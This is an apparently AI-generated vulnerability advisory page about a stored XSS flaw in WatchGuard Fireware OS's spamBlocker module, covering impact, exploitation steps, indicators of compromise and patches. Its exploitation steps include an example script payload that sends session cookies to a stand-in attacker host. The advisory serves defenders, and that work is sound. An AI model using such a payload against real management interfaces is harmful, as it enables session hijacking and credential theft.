CVE-2026-13376
WatchGuard Firebox vulnerability analysis and mitigation

Overview

CVE-2026-13376 is a Stored Cross-Site Scripting (XSS) vulnerability in the spamBlocker module of WatchGuard Fireware OS, classified under CWE-79. It is described as an additional unmitigated attack path for the previously disclosed CVE-2025-1071. Affected versions include Fireware OS 12.0 through 12.12, 12.5 through 12.5.18, and 2025.1 through 2026.2. The vulnerability was published on July 3, 2026, and carries a CVSS v3.1 base score of 4.8 (Medium) (WatchGuard Advisory, GitHub Advisory).

Technical details

The root cause is improper neutralization of user-controllable input in the spamBlocker module's web page generation logic (CWE-79), allowing malicious scripts to be persistently stored and later rendered in victims' browsers. Exploitation requires an attacker to hold high-privilege credentials on the Fireware OS management interface and to inject a crafted payload into the spamBlocker module; a separate user must then view the affected page (passive user interaction required). The vulnerability is network-accessible with low attack complexity, and it represents an additional, previously unpatched attack path related to CVE-2025-1071 (WatchGuard Advisory, GitHub Advisory). No public proof-of-concept code has been identified at this time.

Impact

Successful exploitation allows an authenticated attacker to inject malicious scripts into the spamBlocker module that are persistently stored and executed in the browsers of any user who subsequently views the affected administrative pages. This can result in session token theft, credential harvesting, and unauthorized actions performed on behalf of legitimate users within the Fireware OS management interface. The impact is limited to low confidentiality and low integrity effects on subsequent systems, with no direct availability impact (WatchGuard Advisory, GitHub Advisory).

Exploitability

As of the time of publication, there is no evidence of active in-the-wild exploitation or publicly available proof-of-concept exploit code for CVE-2026-13376. CISA's SSVC assessment indicates exploitation is currently "none" and the vulnerability is not automatable. The EPSS score is approximately 0.158%, placing it in the 5th percentile for exploitation likelihood within 30 days. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog (GitHub Advisory, WatchGuard Advisory).

Exploitation steps

  1. Gain privileged access: Obtain high-privilege (administrative) credentials to the WatchGuard Fireware OS management interface on a vulnerable version (12.0–12.12, 12.5–12.5.18, or 2025.1–2026.2).
  2. Navigate to spamBlocker module: Access the spamBlocker configuration section within the Fireware OS web management UI.
  3. Inject stored XSS payload: Enter a crafted JavaScript payload (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into a user-controlled input field within the spamBlocker module that is not properly sanitized before storage.
  4. Wait for victim interaction: When another authenticated user (e.g., a network administrator) views the affected spamBlocker page, the stored script executes in their browser context.
  5. Harvest session tokens or credentials: The executed script exfiltrates session cookies or performs actions on behalf of the victim user, potentially enabling further privilege escalation or unauthorized configuration changes (WatchGuard Advisory, GitHub Advisory).

Indicators of compromise

  • Logs: Fireware OS management interface access logs showing unusual input submissions to spamBlocker configuration fields containing HTML tags or JavaScript syntax (e.g., <script>, onerror=, javascript:).
  • Network: Outbound HTTP/S requests from administrator browsers to unexpected external domains shortly after accessing the spamBlocker management page, potentially indicating cookie or credential exfiltration.
  • Logs: Browser-side console errors or unexpected redirects logged in endpoint security tools when administrators access the spamBlocker module.
  • File System/Config: Unexpected or anomalous entries in spamBlocker configuration data containing encoded or obfuscated script content.

Mitigation and workarounds

WatchGuard has released patched versions addressing this vulnerability: upgrade to Fireware OS 12.12.1 or later (for the 12.x branch), a version beyond 12.5.18 for the 12.5 branch, or 2026.2.1 or later for the 2025.1+ branch. As interim mitigations, administrators should restrict access to the spamBlocker module's administrative interface to trusted users only, implement Content Security Policy (CSP) headers where possible, and monitor spamBlocker logs for suspicious script injection attempts. If the spamBlocker module is not actively required, consider disabling it until patching is complete (WatchGuard Advisory).

Additional resources


SourceThis report was generated using AI

Related WatchGuard Firebox vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-13722HIGH8.6
  • WatchGuard Firebox logoWatchGuard Firebox
  • cpe:2.3:o:watchguard:fireware
NoYesJul 03, 2026
CVE-2026-13384HIGH8.6
  • WatchGuard Firebox logoWatchGuard Firebox
  • cpe:2.3:o:watchguard:fireware
NoYesJul 03, 2026
CVE-2026-13383HIGH8.6
  • WatchGuard Firebox logoWatchGuard Firebox
  • cpe:2.3:o:watchguard:fireware
NoYesJul 03, 2026
CVE-2026-8247HIGH7.7
  • WatchGuard Firebox logoWatchGuard Firebox
  • cpe:2.3:o:watchguard:fireware
NoYesJul 03, 2026
CVE-2026-13728MEDIUM5.9
  • WatchGuard Firebox logoWatchGuard Firebox
  • cpe:2.3:o:watchguard:fireware
NoYesJul 03, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management